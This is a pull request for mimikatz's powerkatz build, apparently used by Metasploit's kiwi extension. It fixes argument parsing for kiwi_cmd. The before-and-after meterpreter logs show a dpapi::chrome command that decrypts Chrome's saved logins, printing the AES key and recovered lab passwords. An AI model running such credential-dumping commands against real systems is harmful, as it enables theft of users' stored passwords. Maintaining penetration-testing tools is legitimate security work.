### PR TITLE
fix issue with kiwi_cmd arguments

### DIFF
--- a/mimikatz/mimikatz.c
+++ b/mimikatz/mimikatz.c
@@ -255,12 +255,62 @@ NTSTATUS mimikatz_doLocal(wchar_t * input)
 }
 
 #if defined(_POWERKATZ)
+LPWSTR * CommandLineToArguments(LPCWSTR lpCmdLine, int* pNumArgs)
+{
+	int argc = 0;
+	wchar_t ** argv;
+
+	int retargc = 0;
+	wchar_t ** retargv = 0;
+
+	if(argv = CommandLineToArgvW(lpCmdLine, &argc)) {
+		retargv = LocalAlloc(LPTR, argc * sizeof(wchar_t*));
+		wchar_t * addcommand = 0;
+		for (int arg = 0; arg < argc; arg++)
+		{
+			//Is the command actually an argument for the previous command?, e.g /in:something
+			if (addcommand && (wcsncmp(argv[arg], L"/", 1) == 0))
+			{
+				size_t newarglen = wcslen(addcommand) + wcslen(argv[arg]) + 10;
+				wchar_t * newarg = LocalAlloc(LPTR, newarglen * sizeof(wchar_t));
+				if (wcsstr(argv[arg], L" ")) {
+					swprintf_s(newarg, newarglen, L"%ls \"%ls\"", addcommand, argv[arg]);
+				} else {
+					swprintf_s(newarg, newarglen, L"%ls %ls", addcommand, argv[arg]);
+				}
+				LocalFree(addcommand);
+				addcommand = newarg;
+			} else {
+				if (addcommand) 
+				{
+					retargv[retargc++] = addcommand;
+					addcommand = 0;
+				}
+
+				size_t newarglen = wcslen(argv[arg]) + 1;
+				addcommand = LocalAlloc(LPTR, newarglen * sizeof(wchar_t));
+				wcscpy_s(addcommand, newarglen, argv[arg]);
+			}
+		}
+
+		if (addcommand) 
+		{
+			retargv[retargc++] = addcommand;
+		}
+
+		LocalFree(argv);
+	}
+
+	*pNumArgs = retargc;
+	return retargv;
+}
+
 wchar_t * powershell_reflective_mimikatz(LPCWSTR input)
 {
 	int argc = 0;
 	wchar_t ** argv;
 	
-	if(argv = CommandLineToArgvW(input, &argc))
+	if(argv = CommandLineToArguments(input, &argc))
 	{
 		if (outputBuffer == NULL)
 		{


### PR DESCRIPTION
This change fixes https://github.com/rapid7/metasploit-framework/issues/15622
This change fixes the argument parsing of kiwi_cmd so that the arguments of commands are not separated.
Before CommandLineToArgvW would naively split it's input into separate arguments, e.g:

`dpapi::chrome "/in:%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect` becomes:
```
argv[0] dpapi::chrome
argv[1] /in:%localappdata%\Google\Chrome\User Data\Default\Login Data
argv[2] /unprotect
```
After this change the arguments are kept with the previous command, e,g:
```
argv[0] dpapi::chrome "/in:%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
```
## Before

```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd 'base64 /in:off /out:off'
isBase64InterceptInput  is false
isBase64InterceptOutput is false

meterpreter > kiwi_cmd dpapi::chrome "/in:%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:"%localappdata%\Google\Chrome\User Data\Default\Login Data")

mimikatz(powershell) # /in:%localappdata%\Google\Chrome\User Data\Default\Login Data
ERROR mimikatz_doLocal ; "/in:C:\Users\User\AppData\Local\Google\Chrome\User" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # /unprotect
ERROR mimikatz_doLocal ; "/unprotect" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

meterpreter >
```

## After

```
meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /metasploit-framework/data/meterpreter/ext_server_kiwi.x64.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd 'base64 /in:off /out:off'
isBase64InterceptInput  is false
isBase64InterceptOutput is false

meterpreter > kiwi_cmd dpapi::chrome "/in:%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
> AES Key is: 3af0783c2f8e42489504f6e115a4dfdaf1b14030e5e54906e7d96f2f786e2242

URL     : http://natas0.natas.labs.overthewire.org/Authentication required ( http://natas0.natas.labs.overthewire.org/ )
Username: natas0
 * using CryptUnprotectData API
Password: natas0

URL     : http://natas1.natas.labs.overthewire.org/Authentication required ( http://natas1.natas.labs.overthewire.org/ )
Username: natas1
 * using BCrypt with AES-256-GCM
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto

```